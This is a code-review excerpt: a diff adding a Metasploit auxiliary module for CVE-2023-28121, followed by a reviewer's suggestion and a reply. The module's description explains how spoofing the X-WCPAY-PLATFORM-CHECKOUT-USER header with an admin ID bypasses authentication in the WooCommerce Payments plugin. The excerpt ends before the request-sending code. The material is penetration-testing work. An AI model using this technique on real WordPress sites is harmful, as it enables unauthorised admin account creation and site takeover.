modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation',
+        'Description' => %q{
+          WooCommerce-Payments plugin for Wordpress contains an authentication bypass by specifing a valid user ID number
+          within the `X-WCPAY-PLATFORM-CHECKOUT-USER` header.  With this authentication bypass, a user can then use the API
+          to create a new user with administartive privileges IF the user ID selected was also an administrator.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Michael Mazzolini', # original discovery
+          'Julien Ahrens' # detailed writeup
+        ],
+        'References' => [
+          [ 'URL', 'https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/'],
+          [ 'URL', 'https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/'],
+          [ 'CVE', '2023-28121']
+        ],
+        'DisclosureDate' => '2023-03-22',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to create', '']),
+        OptString.new('PASSWORD', [ false, 'Password to create, random if blank', '']),
+        OptString.new('EMAIL', [ false, 'Email to create, random if blank', '']),
+        OptInt.new('ADMINID', [ false, 'ID Number of an administrative user', 1]),
+        OptString.new('TARGETURI', [ true, 'The URI of the Wordpress instance', '/'])
+      ]
+    )
+  end
+
+  def check
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('woocommerce-payments', '5.6.2')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('WooCommerce-Payments version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def run
+    if datastore['PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(10..15)
+    else
+      password = datastore['PASSWORD']
+    end
+    if datastore['EMAIL'].blank?
+      email = Rex::Text.rand_mail_address
+    else
+      email = datastore['EMAIL']
+    end
```

Comment:
```suggestion
    email = datastore['EMAIL']
    if email.blank?
      email = Rex::Text.rand_mail_address
    end
```

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/da6cdd1d5b3c19b87702488dd8f64e3c1d963328